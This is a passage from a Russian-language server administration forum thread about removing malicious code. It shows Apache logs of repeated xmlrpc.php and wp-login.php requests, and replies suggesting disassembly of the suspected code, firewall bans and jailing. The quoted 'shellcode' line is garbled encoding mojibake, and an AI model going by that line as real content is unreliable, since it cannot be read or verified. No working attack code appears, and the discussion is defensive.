146.185.251.210 - - [18/Jun/2016:13:14:15 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.253 - - [18/Jun/2016:13:14:27 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:13:14:51 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
188.143.232.67 - - [18/Jun/2016:13:14:58 +0400] "GET /wp-login.php HTTP/1.1" 200 4321
185.93.185.249 - - [18/Jun/2016:13:14:51 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.248 - - [18/Jun/2016:13:15:02 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.249 - - [18/Jun/2016:13:15:05 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:13:16:00 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:13:16:49 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:13:17:48 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:13:17:56 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:13:18:13 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
Xeon X5460, RAM 8Gb, FreeBSD 11.0-RELEASE-p2 on amd64, Apache 2.4.27, PHP 5.6.31, MySQL 5.6.37, Exim 4.91_3, Dovecot 2.3.2.1_1

Аватара пользователя
dekloper
ст. лейтенант
Сообщения: 1325
Зарегистрирован: 2008-02-24 15:43:19
Откуда: давно здесь сидим..
Контактная информация:

Помогите извести вредный код

Непрочитанное сообщение dekloper » 2016-06-21 1:31:06

gyurza2000 писал(а): \xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xba\xc3\x83\xc6\x92\xc3\xa2\xe2\x82\xac\xcb\x9c\xc3\x83\xc2\xa2\xc3\xa2\xe2\x82\xac\xc5\xa1\xc3\x82\xc2\xac\xc3\x83\xc6\x92\xc3\xa2\xe2\x82\xac\xcb\x9c\xc3\x83\xe2\x80\xa0\xc3\xa2\xe2\x82\xac\xe2\x84\xa2\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xb3\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xbe\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xb2\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xbe\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xb9%20\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xbf\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xbe\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xbb\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xb8\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xb2
обычный децкий шелкод, дизассемблировать его для начала..
потом можно и.. потренироваться на кошках.. ;)
ТОВАгИЩИ! БгАТЬЯ И СЕСТгЫ! ДОЛОЙ гАВНОДУШИЕ!

gyurza2000
лейтенант
Сообщения: 807
Зарегистрирован: 2007-07-08 23:53:20
Откуда: SPb
Контактная информация:

Помогите извести вредный код

Непрочитанное сообщение gyurza2000 » 2016-06-21 2:01:19

Успокоили :) Чем?
Xeon X5460, RAM 8Gb, FreeBSD 11.0-RELEASE-p2 on amd64, Apache 2.4.27, PHP 5.6.31, MySQL 5.6.37, Exim 4.91_3, Dovecot 2.3.2.1_1

Аватара пользователя
dekloper
ст. лейтенант
Сообщения: 1325
Зарегистрирован: 2008-02-24 15:43:19
Откуда: давно здесь сидим..
Контактная информация:

Помогите извести вредный код

Непрочитанное сообщение dekloper » 2016-06-21 2:57:07

да не, так мысли вслух, взял себе на заметку..

у вас че фаервола нормального нет, забаньте его к ебеням и всегоделов.. ну как минимум..
ну и коллектив правильно советует, по клеткам их распихать.. если копать ниахота..
ТОВАгИЩИ! БгАТЬЯ И СЕСТгЫ! ДОЛОЙ гАВНОДУШИЕ!